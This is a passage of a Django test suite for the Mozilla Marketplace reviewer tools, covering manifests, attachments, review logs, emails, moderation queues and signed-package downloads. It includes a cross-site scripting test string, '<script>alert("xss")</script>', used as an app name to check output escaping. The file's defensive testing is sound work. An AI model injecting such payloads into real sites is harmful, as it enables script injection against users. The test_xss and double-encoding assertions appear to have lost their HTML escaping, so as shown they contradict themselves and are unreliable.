r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
data = json.loads(r.content)
assert u'"name": "W2MO\u017d"' in data['content']
@mock.patch('mkt.reviewers.views.requests.get')
def test_manifest_json_encoding_empty(self, mock_get):
m = mock.Mock()
m.content = ''
m.headers = CaseInsensitiveDict({})
mock_get.return_value = m
r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
eq_(json.loads(r.content), {'content': u'', 'headers': {},
'success': True, 'permissions': {}})
@mock.patch('mkt.reviewers.views.requests.get')
def test_manifest_json_traceback_in_response(self, mock_get):
m = mock.Mock()
m.content = {'name': 'Some name'}
m.headers = CaseInsensitiveDict({})
mock_get.side_effect = requests.exceptions.SSLError
mock_get.return_value = m
# We should not 500 on a traceback.
r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
data = json.loads(r.content)
assert data['content'], 'There should be a content with the traceback'
eq_(data['headers'], {})
@mock.patch('mkt.reviewers.views.json.dumps')
def test_manifest_json_packaged(self, mock_):
# Test that when the app is packaged, _mini_manifest is called.
mock_.return_value = '{}'
self.get_app().update(is_packaged=True)
res = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(res.status_code, 200)
assert mock_.called
@mock.patch('mkt.reviewers.views._get_manifest_json')
def test_manifest_json_perms(self, mock_):
mock_.return_value = {
'permissions': {
"foo": {"description": "foo"},
"camera": {"description": "<script>"}
}
}
self.get_app().update(is_packaged=True)
r = self.client.get(reverse('reviewers.apps.review.manifest',
args=[self.app.app_slug]))
eq_(r.status_code, 200)
eq_(json.loads(r.content)['permissions'],
{'foo': {'description': 'foo', 'type': 'web'},
'camera': {'description': '<script>', 'type': 'cert'}})
def test_abuse(self):
AbuseReport.objects.create(addon=self.app, message='!@#$')
res = self.client.get(self.url)
doc = pq(res.content)
dd = doc('.reviewers-desktop #summary dd.abuse-reports')
eq_(dd.text(), u'1')
eq_(dd.find('a').attr('href'), reverse('reviewers.apps.review.abuse',
args=[self.app.app_slug]))
dd = doc('.reviewers-mobile #summary dd.abuse-reports')
eq_(dd.text(), u'1')
eq_(dd.find('a').attr('href'), reverse('reviewers.apps.review.abuse',
args=[self.app.app_slug]))
def _attachment_form_data(self, num=1, action='comment'):
data = {'action': action,
'comments': 'mmm, nice app'}
data.update(self._attachment_management_form(num=num))
data.update(self._attachments(num))
return data
def _attachment_post(self, num):
"""
Test that `num` attachment objects are successfully created by the
appropriate form submission. Tests this in two ways:
1) Ensuring that the form is submitted correctly.
2) Checking that the appropriate number of objects are created.
"""
old_attachment_count = ActivityLogAttachment.objects.all().count()
self.post(self._attachment_form_data(num=num))
new_attachment_count = ActivityLogAttachment.objects.all().count()
eq_(new_attachment_count - old_attachment_count, num,
'AcitvityLog objects not being created')
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_no_attachments(self, save_mock):
""" Test addition of no attachment """
self.post(self._attachment_form_data(num=0, action='public'))
eq_(save_mock.called, False, save_mock.call_args_list)
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment(self, save_mock):
""" Test addition of an attachment """
self._attachment_post(1)
eq_(save_mock.call_args_list[0],
mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email(self, save_mock):
"""
Test that a single attachment is included as an attachment in
notification emails.
"""
self.post(self._attachment_form_data(num=1, action='escalate'))
eq_(len(mail.outbox[0].attachments), 1,
'Review attachment not added to email')
for attachment in mail.outbox[0].attachments:
self.assertNotEqual(len(attachment), 0, '0-length attachment')
eq_(save_mock.call_args_list[0],
mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_multiple(self, save_mock):
"""
Test that mutliple attachments are included as attachments in
notification emails.
"""
self.post(self._attachment_form_data(num=2, action='reject'))
eq_(len(mail.outbox[0].attachments), 2,
'Review attachments not added to email')
eq_(save_mock.call_args_list[0],
mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_escalate(self, save_mock):
"""
Test that attachments are included as attachments in an `escalate`
review, which uses a different mechanism for notification email
sending.
"""
self.post(self._attachment_form_data(num=1, action='escalate'))
eq_(len(mail.outbox[0].attachments), 1,
'Review attachment not added to email')
eq_(save_mock.call_args_list[0],
mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
@mock.patch('amo.utils.LocalFileStorage.save')
def test_attachment_email_requestinfo(self, save_mock):
"""
Test that attachments are included as attachments in an `info` review,
which uses a different mechanism for notification email sending.
"""
self.post(self._attachment_form_data(num=1, action='info'))
eq_(len(mail.outbox[0].attachments), 1,
'Review attachment not added to email')
eq_(save_mock.call_args_list[0],
mock.call(path.join(ATTACHMENTS_DIR, 'bacon.txt'), mock.ANY))
def test_idn_app_domain(self):
response = self.client.get(self.url)
assert not 'IDN domain!' in response.content
self.get_app().update(app_domain=u'http://www.allïzom.org')
response = self.client.get(self.url)
assert 'IDN domain!' in response.content
def test_priority_flag_cleared_for_public(self):
self.get_app().update(priority_review=True)
data = {'action': 'public', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(self.get_app().priority_review, False)
def test_priority_flag_uncleared_for_reject(self):
self.get_app().update(priority_review=True)
data = {'action': 'reject', 'device_types': '', 'browsers': '',
'comments': 'something'}
data.update(self._attachment_management_form(num=0))
self.post(data)
eq_(self.get_app().priority_review, True)
def test_is_tarako_checkbox(self):
res = self.client.get(self.url)
eq_(pq(res.content)('#id_is_tarako:checked').length, 0)
app = self.get_app()
Tag(tag_text='tarako').save_tag(app)
res = self.client.get(self.url)
eq_(pq(res.content)('#id_is_tarako:checked').length, 1)
def test_is_tarako_on(self):
# Note: Using action=comment b/c it does less and keeps test faster.
data = {'action': 'comment', 'comments': 'blah', 'is_tarako': 'on'}
data.update(self._attachment_management_form(num=0))
self.post(data)
tags = self.get_app().tags.values_list('tag_text', flat=True)
assert 'tarako' in tags
def test_is_tarako_off(self):
# Note: Using action=comment b/c it does less and keeps test faster.
# Note: `is_tarako` isn't passed b/c checkboxes.
data = {'action': 'comment', 'comments': 'blah'}
data.update(self._attachment_management_form(num=0))
self.post(data)
tags = self.get_app().tags.values_list('tag_text', flat=True)
assert 'tarako' not in tags
class TestCannedResponses(AppReviewerTest):
def setUp(self):
super(TestCannedResponses, self).setUp()
self.login_as_editor()
self.app = app_factory(name='XXX',
status=amo.STATUS_PENDING)
self.cr_addon = CannedResponse.objects.create(
name=u'addon reason', response=u'addon reason body',
sort_group=u'public', type=amo.CANNED_RESPONSE_ADDON)
self.cr_app = CannedResponse.objects.create(
name=u'app reason', response=u'app reason body',
sort_group=u'public', type=amo.CANNED_RESPONSE_APP)
self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])
def test_no_addon(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
form = r.context['form']
choices = form.fields['canned_response'].choices[1][1]
# choices is grouped by the sort_group, where choices[0] is the
# default "Choose a response..." option.
# Within that, it's paired by [group, [[response, name],...]].
# So above, choices[1][1] gets the first real group's list of
# responses.
eq_(len(choices), 1)
assert self.cr_app.response in choices[0]
assert self.cr_addon.response not in choices[0]
class TestReviewLog(AppReviewerTest, AccessMixin):
def setUp(self):
self.login_as_editor()
super(TestReviewLog, self).setUp()
# Note: if `created` is not specified, `addon_factory`/`app_factory`
# uses a randomly generated timestamp.
self.apps = [app_factory(name='XXX', created=days_ago(3),
status=amo.STATUS_PENDING),
app_factory(name='YYY', created=days_ago(2),
status=amo.STATUS_PENDING)]
self.url = reverse('reviewers.apps.logs')
self.task_user = UserProfile.objects.get(email='[email protected]')
patcher = mock.patch.object(settings, 'TASK_USER_ID',
self.task_user.id)
patcher.start()
self.addCleanup(patcher.stop)
def get_user(self):
return UserProfile.objects.all()[0]
def make_approvals(self):
for app in self.apps:
amo.log(amo.LOG.REJECT_VERSION, app, app.current_version,
user=self.get_user(), details={'comments': 'youwin'})
# Throw in a few tasks logs that shouldn't get queried.
amo.log(amo.LOG.REREVIEW_MANIFEST_CHANGE, app, app.current_version,
user=self.task_user, details={'comments': 'foo'})
def make_an_approval(self, action, comment='youwin', username=None,
app=None):
if username:
user = UserProfile.objects.get(username=username)
else:
user = self.get_user()
if not app:
app = self.apps[0]
amo.log(action, app, app.current_version, user=user,
details={'comments': comment})
def test_basic(self):
self.make_approvals()
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
assert doc('#log-filter button'), 'No filters.'
# Should have 2 showing.
rows = doc('tbody tr')
eq_(rows.filter(':not(.hide)').length, 2)
eq_(rows.filter('.hide').eq(0).text(), 'youwin')
def test_search_app_soft_deleted(self):
self.make_approvals()
self.apps[0].update(status=amo.STATUS_DELETED)
res = self.client.get(self.url)
eq_(res.status_code, 200)
doc = pq(res.content)
all_reviews = [d.attrib.get('data-addonid')
for d in doc('#log-listing tbody tr')]
assert str(self.apps[0].pk) in all_reviews, (
'Soft deleted review did not show up in listing')
def test_xss(self):
a = self.apps[0]
a.name = '<script>alert("xss")</script>'
a.save()
amo.log(amo.LOG.REJECT_VERSION, a, a.current_version,
user=self.get_user(), details={'comments': 'xss!'})
r = self.client.get(self.url)
eq_(r.status_code, 200)
inner_html = pq(r.content)('#log-listing tbody td').eq(1).html()
assert '<script>' in inner_html
assert '<script>' not in inner_html
def test_end_filter(self):
"""
Let's use today as an end-day filter and make sure we see stuff if we
filter.
"""
self.make_approvals()
# Make sure we show the stuff we just made.
date = time.strftime('%Y-%m-%d')
r = self.client.get(self.url, dict(end=date))
eq_(r.status_code, 200)
doc = pq(r.content)('#log-listing tbody')
eq_(doc('tr:not(.hide)').length, 2)
eq_(doc('tr.hide').eq(0).text(), 'youwin')
def test_end_filter_wrong(self):
"""
Let's use today as an end-day filter and make sure we see stuff if we
filter.
"""
self.make_approvals()
r = self.client.get(self.url, dict(end='wrong!'))
# If this is broken, we'll get a traceback.
eq_(r.status_code, 200)
eq_(pq(r.content)('#log-listing tr:not(.hide)').length, 3)
def test_search_comment_exists(self):
"""Search by comment."""
self.make_an_approval(amo.LOG.ESCALATE_MANUAL, comment='hello')
r = self.client.get(self.url, dict(search='hello'))
eq_(r.status_code, 200)
eq_(pq(r.content)('#log-listing tbody tr.hide').eq(0).text(), 'hello')
def test_search_comment_doesnt_exist(self):
"""Search by comment, with no results."""
self.make_an_approval(amo.LOG.ESCALATE_MANUAL, comment='hello')
r = self.client.get(self.url, dict(search='bye'))
eq_(r.status_code, 200)
eq_(pq(r.content)('.no-results').length, 1)
def test_search_author_exists(self):
"""Search by author."""
self.make_approvals()
self.make_an_approval(amo.LOG.ESCALATE_MANUAL, username='editor',
comment='hi')
r = self.client.get(self.url, dict(search='editor'))
eq_(r.status_code, 200)
rows = pq(r.content)('#log-listing tbody tr')
eq_(rows.filter(':not(.hide)').length, 1)
eq_(rows.filter('.hide').eq(0).text(), 'hi')
def test_search_author_doesnt_exist(self):
"""Search by author, with no results."""
self.make_approvals()
self.make_an_approval(amo.LOG.ESCALATE_MANUAL, username='editor')
r = self.client.get(self.url, dict(search='wrong'))
eq_(r.status_code, 200)
eq_(pq(r.content)('.no-results').length, 1)
def test_search_addon_exists(self):
"""Search by add-on name."""
self.make_approvals()
app = self.apps[0]
r = self.client.get(self.url, dict(search=app.name))
eq_(r.status_code, 200)
tr = pq(r.content)('#log-listing tr[data-addonid="%s"]' % app.id)
eq_(tr.length, 1)
eq_(tr.siblings('.comments').text(), 'youwin')
def test_search_addon_by_slug_exists(self):
"""Search by app slug."""
app = self.apps[0]
app.app_slug = 'a-fox-was-sly'
app.save()
self.make_approvals()
r = self.client.get(self.url, dict(search='fox'))
eq_(r.status_code, 200)
tr = pq(r.content)('#log-listing tr[data-addonid="%s"]' % app.id)
eq_(tr.length, 1)
eq_(tr.siblings('.comments').text(), 'youwin')
def test_search_addon_doesnt_exist(self):
"""Search by add-on name, with no results."""
self.make_approvals()
r = self.client.get(self.url, dict(search='zzz'))
eq_(r.status_code, 200)
eq_(pq(r.content)('.no-results').length, 1)
@mock.patch('devhub.models.ActivityLog.arguments', new=mock.Mock)
def test_addon_missing(self):
self.make_approvals()
r = self.client.get(self.url)
eq_(pq(r.content)('#log-listing tr td').eq(1).text(),
'App has been deleted.')
def test_request_info_logs(self):
self.make_an_approval(amo.LOG.REQUEST_INFORMATION)
r = self.client.get(self.url)
eq_(pq(r.content)('#log-listing tr td a').eq(1).text(),
'More information requested')
def test_escalate_logs(self):
self.make_an_approval(amo.LOG.ESCALATE_MANUAL)
r = self.client.get(self.url)
eq_(pq(r.content)('#log-listing tr td a').eq(1).text(),
'Reviewer escalation')
def test_no_double_encode(self):
version = self.apps[0].current_version
version.update(version='<foo>')
self.make_an_approval(amo.LOG.ESCALATE_MANUAL)
r = self.client.get(self.url)
assert '<foo>' in pq(r.content)('#log-listing tr td').eq(1).text(), (
'Double-encoded string was found in reviewer log.')
class TestMotd(AppReviewerTest, AccessMixin):
def setUp(self):
super(TestMotd, self).setUp()
self.url = reverse('reviewers.apps.motd')
self.key = u'mkt_reviewers_motd'
set_config(self.key, u'original value')
def test_perms_not_editor(self):
self.client.logout()
req = self.client.get(self.url, follow=True)
self.assert3xx(req, '%s?to=%s' % (reverse('users.login'), self.url))
self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_perms_not_motd(self):
# Any type of reviewer can see the MOTD.
self.login_as_editor()
req = self.client.get(self.url)
eq_(req.status_code, 200)
eq_(req.context['form'], None)
# No redirect means it didn't save.
eq_(self.client.post(self.url, dict(motd='motd')).status_code, 200)
eq_(get_config(self.key), u'original value')
def test_motd_change(self):
# Only users in the MOTD group can POST.
user = UserProfile.objects.get(email='[email protected]')
self.grant_permission(user, 'AppReviewerMOTD:Edit')
self.login_as_editor()
# Get is a 200 with a form.
req = self.client.get(self.url)
eq_(req.status_code, 200)
eq_(req.context['form'].initial['motd'], u'original value')
# Empty post throws an error.
req = self.client.post(self.url, dict(motd=''))
eq_(req.status_code, 200) # Didn't redirect after save.
eq_(pq(req.content)('#editor-motd .errorlist').text(),
'This field is required.')
# A real post now.
req = self.client.post(self.url, dict(motd='new motd'))
self.assert3xx(req, self.url)
eq_(get_config(self.key), u'new motd')
class TestReviewAppComm(AppReviewerTest, AttachmentManagementMixin):
"""
Test communication threads + notes are created and that emails are
sent to the right groups of people.
"""
fixtures = ['base/users']
def setUp(self):
super(TestReviewAppComm, self).setUp()
self.create_switch('comm-dashboard', db=True)
self.app = app_factory(rated=True, status=amo.STATUS_PENDING,
mozilla_contact='[email protected]')
self.app.addonuser_set.create(user=user_factory(username='dev'))
self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])
self.contact = user_factory(username='contact')
def _post(self, data, queue='pending'):
res = self.client.post(self.url, data)
self.assert3xx(res, reverse('reviewers.apps.queue_%s' % queue))
def _get_note(self):
eq_(self.app.threads.count(), 1)
thread = self.app.threads.all()[0]
eq_(thread.notes.count(), 1)
return thread.notes.all()[0]
def _check_email(self, msg, subject, to=None):
if to:
eq_(msg.to, to)
else:
eq_(msg.to, list(self.app.authors.values_list('email', flat=True)))
eq_(msg.cc, [])
eq_(msg.subject, '%s: %s' % (subject, self.app.name))
eq_(msg.from_email, settings.MKT_REVIEWERS_EMAIL)
def _get_mail(self, username):
return filter(lambda x: x.to[0].startswith(username),
mail.outbox)[0]
def _check_email_dev_and_contact(self, outbox_len=2):
"""
Helper for checking developer and Mozilla contact get emailed with
'Submission Update' email.
"""
eq_(len(mail.outbox), outbox_len)
self._check_email( # Developer.
self._get_mail('dev'), 'Submission Update')
self._check_email( # Mozilla contact.
self._get_mail('contact'), 'Submission Update',
to=[self.contact.email])
def test_email_cc(self):
"""
Emailed cc'ed people (those who have posted on the thread).
"""
poster = user_factory()
thread, note = create_comm_note(
self.app, self.app.current_version, poster, 'lgtm')
data = {'action': 'public', 'comments': 'gud jerb'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test emails.
self._check_email_dev_and_contact(outbox_len=5)
self._check_email( # Some person who joined the thread.
self._get_mail(poster.username), 'Submission Update',
to=[poster.email])
def test_approve(self):
"""
On approval, send an email to [developer, mozilla contact].
"""
data = {'action': 'public', 'comments': 'gud jerb'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.APPROVAL)
eq_(note.body, 'gud jerb')
# Test emails.
self._check_email_dev_and_contact()
def test_reject(self):
"""
On rejection, send an email to [developer, mozilla contact].
"""
data = {'action': 'reject', 'comments': 'rubesh'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.REJECTION)
eq_(note.body, 'rubesh')
# Test emails.
self._check_email_dev_and_contact()
def test_info(self):
"""
On info request, send an email to [developer, mozilla contact].
"""
data = {'action': 'info', 'comments': 'huh'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.MORE_INFO_REQUIRED)
eq_(note.body, 'huh')
# Test emails.
self._check_email_dev_and_contact()
def test_escalate(self):
"""
On escalation, send an email to [senior reviewers].
"""
admin = user_factory()
group = Group.objects.create(name='Senior App Reviewers')
group.groupuser_set.create(user=admin)
data = {'action': 'escalate', 'comments': 'soup her man'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.ESCALATION)
eq_(note.body, 'soup her man')
# Test emails.
eq_(len(mail.outbox), 1)
self._check_email( # Senior reviewer.
mail.outbox[0], 'Escalated Review Requested', to=[admin.email])
def test_comment(self):
"""
On reviewer comment, send an email to those but developers.
"""
data = {'action': 'comment', 'comments': 'huh'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.REVIEWER_COMMENT)
eq_(note.body, 'huh')
# Test emails.
eq_(len(mail.outbox), 1)
self._check_email( # Mozilla contact.
mail.outbox[0], 'Submission Update', to=[self.contact.email])
def test_disable(self):
"""
On disable, send an email to [developer, mozilla contact].
"""
self.login_as_admin()
data = {'action': 'disable', 'comments': 'u dun it'}
data.update(self._attachment_management_form(num=0))
self._post(data)
# Test notes.
note = self._get_note()
eq_(note.note_type, comm.DISABLED)
eq_(note.body, 'u dun it')
# Test emails.
self._check_email_dev_and_contact()
def test_attachments(self):
data = {'action': 'comment', 'comments': 'huh'}
data.update(self._attachment_management_form(num=2))
data.update(self._attachments(num=2))
self._post(data)
# Test attachments.
note = self._get_note()
eq_(note.attachments.count(), 2)
class TestModeratedQueue(AppReviewerTest, AccessMixin):
fixtures = ['base/users']
def setUp(self):
self.app = app_factory()
self.reviewer = UserProfile.objects.get(email='[email protected]')
self.users = list(UserProfile.objects.exclude(pk=self.reviewer.id))
self.url = reverse('reviewers.apps.queue_moderated')
self.review1 = Review.objects.create(addon=self.app, body='body',
user=self.users[0], rating=3,
editorreview=True)
ReviewFlag.objects.create(review=self.review1, flag=ReviewFlag.SPAM,
user=self.users[0])
self.review2 = Review.objects.create(addon=self.app, body='body',
user=self.users[1], rating=4,
editorreview=True)
ReviewFlag.objects.create(review=self.review2, flag=ReviewFlag.SUPPORT,
user=self.users[1])
self.client.login(username=self.reviewer.email, password='password')
def _post(self, action):
ctx = self.client.get(self.url).context
data_formset = formset(initial(ctx['reviews_formset'].forms[0]))
data_formset['form-0-action'] = action
res = self.client.post(self.url, data_formset)
self.assert3xx(res, self.url)
def _get_logs(self, action):
return ActivityLog.objects.filter(action=action.id)
def test_setup(self):
eq_(Review.objects.filter(editorreview=True).count(), 2)
eq_(ReviewFlag.objects.filter(flag=ReviewFlag.SPAM).count(), 1)
res = self.client.get(self.url)
doc = pq(res.content)('#reviews-flagged')
# Test the default action is "skip".
eq_(doc('.reviewers-desktop #id_form-0-action_1:checked').length, 1)
def test_skip(self):
# Skip the first review, which still leaves two.
self._post(mkt.ratings.REVIEW_MODERATE_SKIP)
res = self.client.get(self.url)
eq_(len(res.context['page'].object_list), 2)
def test_delete(self):
# Delete the first review, which leaves one.
self._post(mkt.ratings.REVIEW_MODERATE_DELETE)
res = self.client.get(self.url)
eq_(len(res.context['page'].object_list), 1)
eq_(self._get_logs(amo.LOG.DELETE_REVIEW).count(), 1)
def test_keep(self):
# Keep the first review, which leaves one.
self._post(mkt.ratings.REVIEW_MODERATE_KEEP)
res = self.client.get(self.url)
eq_(len(res.context['page'].object_list), 1)
eq_(self._get_logs(amo.LOG.APPROVE_REVIEW).count(), 1)
def test_no_reviews(self):
Review.objects.all().delete()
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(pq(res.content)('#reviews-flagged .no-results').length, 1)
def test_queue_count(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Moderated Reviews (2)')
def test_queue_count_senior_reviewer(self):
self.login_as_senior_reviewer()
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)
eq_(doc('.tabnav li a:eq(0)').text(), u'Apps (0)')
eq_(doc('.tabnav li a:eq(1)').text(), u'Re-reviews (0)')
eq_(doc('.tabnav li a:eq(2)').text(), u'Updates (0)')
eq_(doc('.tabnav li a:eq(3)').text(), u'Escalations (0)')
eq_(doc('.tabnav li a:eq(4)').text(), u'Moderated Reviews (2)')
class TestGetSigned(BasePackagedAppTest, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'user_editor',
'user_editor_group', 'group_editor')
def setUp(self):
super(TestGetSigned, self).setUp()
self.url = reverse('reviewers.signed', args=[self.app.app_slug,
self.version.pk])
self.login('[email protected]')
def test_not_logged_in(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_not_reviewer(self):
self.client.logout()
self.login('[email protected]')
eq_(self.client.get(self.url).status_code, 403)
@mock.patch('lib.crypto.packaged.sign')
def test_reviewer_sign_arguments(self, sign_mock):
self.setup_files()
res = self.client.get(self.url)
eq_(res.status_code, 200)
sign_mock.assert_called_with(self.version.pk, reviewer=True)
@mock.patch.object(packaged, 'sign', mock_sign)
def test_reviewer(self):
if not settings.XSENDFILE:
raise SkipTest()
self.setup_files()
res = self.client.get(self.url)
eq_(res.status_code, 200)
file_ = self.app.current_version.all_files[0]
eq_(res['x-sendfile'], file_.signed_reviewer_file_path)
eq_(res['etag'], '"%s"' % file_.hash.split(':')[-1])
def test_not_packaged(self):
self.app.update(is_packaged=False)
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_wrong_version(self):
self.url = reverse('reviewers.signed', args=[self.app.app_slug, 0])
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_token_good(self):
if not settings.XSENDFILE:
raise SkipTest()
token = Token(data={'app_id': self.app.id})
token.save()
self.setup_files()
self.client.logout()
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 200)
file_ = self.app.current_version.all_files[0]
eq_(res['x-sendfile'], file_.signed_reviewer_file_path)
eq_(res['etag'], '"%s"' % file_.hash.split(':')[-1])
# Test token doesn't work the 2nd time.
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 403)
def test_token_bad(self):
token = Token(data={'app_id': 'abcdef'})
token.save()
self.setup_files()
self.client.logout()
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 403)
class TestMiniManifestView(BasePackagedAppTest):
fixtures = fixture('user_editor', 'user_editor_group', 'group_editor',
'user_999', 'webapp_337141')
def setUp(self):
super(TestMiniManifestView, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.app.update(is_packaged=True)
self.version = self.app.versions.latest()
self.file = self.version.all_files[0]
self.file.update(filename='mozball.zip')
self.url = reverse('reviewers.mini_manifest', args=[self.app.app_slug,
self.version.pk])
self.login('[email protected]')
def test_not_logged_in(self):
self.client.logout()
self.assertLoginRequired(self.client.get(self.url))
def test_not_reviewer(self):
self.client.logout()
self.client.login(username='[email protected]', password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_not_packaged(self):
self.app.update(is_packaged=False)
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_wrong_version(self):
url = reverse('reviewers.mini_manifest', args=[self.app.app_slug, 0])
res = self.client.get(url)
eq_(res.status_code, 404)
def test_reviewer(self):
self.setup_files()
manifest = self.app.get_manifest_json(self.file)
res = self.client.get(self.url)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
data = json.loads(res.content)
eq_(data['name'], manifest['name'])
eq_(data['developer']['name'], 'Mozilla Marketplace')
eq_(data['package_path'],
absolutify(reverse('reviewers.signed',
args=[self.app.app_slug, self.version.id])))
def test_rejected(self):
# Rejected sets file.status to DISABLED and moves to a guarded path.
self.setup_files()
self.app.update(status=amo.STATUS_REJECTED)
self.file.update(status=amo.STATUS_DISABLED)
manifest = self.app.get_manifest_json(self.file)
res = self.client.get(self.url)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
data = json.loads(res.content)
eq_(data['name'], manifest['name'])
eq_(data['developer']['name'], 'Mozilla Marketplace')
eq_(data['package_path'],
absolutify(reverse('reviewers.signed',
args=[self.app.app_slug,
self.version.id])))
def test_minifest_name_matches_manifest_name(self):
self.setup_files()
self.app.name = 'XXX'
self.app.save()
manifest = self.app.get_manifest_json(self.file)
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['name'], manifest['name'])
def test_token_good(self):
token = Token(data={'app_id': self.app.id})
token.save()
self.setup_files()
self.client.logout()
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 200)
eq_(res['Content-type'],
'application/x-web-app-manifest+json; charset=utf-8')
data = json.loads(res.content)
ok_('token=' in data['package_path'])
# Test token doesn't work the 2nd time.
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 403)
def test_token_bad(self):
token = Token(data={'app_id': 'abcdef'})
token.save()
self.setup_files()
self.client.logout()
res = self.client.get(urlparams(self.url, token=token.token))
eq_(res.status_code, 403)
class TestReviewersScores(AppReviewerTest, AccessMixin):
fixtures = fixture('group_editor', 'user_editor', 'user_editor_group',
'user_999')
def setUp(self):
super(TestReviewersScores, self).setUp()
self.login_as_editor()
self.user = UserProfile.objects.get(email='[email protected]')
self.url = reverse('reviewers.performance', args=[self.user.username])
def test_404(self):
res = self.client.get(reverse('reviewers.performance', args=['poop']))
eq_(res.status_code, 404)
def test_with_username(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.context['profile'].id, self.user.id)
def test_without_username(self):
res = self.client.get(reverse('reviewers.performance'))
eq_(res.status_code, 200)
eq_(res.context['profile'].id, self.user.id)
def test_no_reviews(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
assert u'No review points awarded yet' in res.content
class TestQueueSort(AppReviewerTest):
fixtures = ['base/users']
def setUp(self):
"""Create and set up apps for some filtering fun."""
self.apps = [app_factory(name='Lillard',
status=amo.STATUS_PENDING,
is_packaged=False,
version_kw={'version': '1.0'},
file_kw={'status': amo.STATUS_PENDING},
admin_review=True,
premium_type=amo.ADDON_FREE),
app_factory(name='Batum',
status=amo.STATUS_PENDING,
is_packaged=True,
version_kw={'version': '1.0',
'has_editor_comment': True,
'has_info_request': True},
file_kw={'status': amo.STATUS_PENDING},
admin_review=False,
premium_type=amo.ADDON_PREMIUM)]
# Set up app attributes.
self.apps[0].update(created=self.days_ago(2))
self.apps[1].update(created=self.days_ago(5))
self.apps[0].addonuser_set.create(
user=UserProfile.objects.create(username='XXX', email='XXX'))
self.apps[1].addonuser_set.create(
user=UserProfile.objects.create(username='illmatic',
email='[email protected]'))
self.apps[0].addondevicetype_set.create(
device_type=amo.DEVICE_DESKTOP.id)
self.apps[1].addondevicetype_set.create(
device_type=amo.DEVICE_MOBILE.id)
self.url = reverse('reviewers.apps.queue_pending')
def test_do_sort_webapp(self):
"""
Test that apps are sorted in order specified in GET params.
"""
rf = RequestFactory()
qs = Webapp.objects.no_cache().all()
# Test apps are sorted by created/asc by default.
r = rf.get(self.url, {'sort': 'invalidsort', 'order': 'dontcare'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[1], self.apps[0]])
# Test sorting by created, descending.
r = rf.get(self.url, {'sort': 'created', 'order': 'desc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[0], self.apps[1]])
# Test sorting by app name.
r = rf.get(self.url, {'sort': 'name', 'order': 'asc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[1], self.apps[0]])
r = rf.get(self.url, {'sort': 'name', 'order': 'desc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[0], self.apps[1]])
# By abuse reports.
AbuseReport.objects.create(addon=self.apps[1])
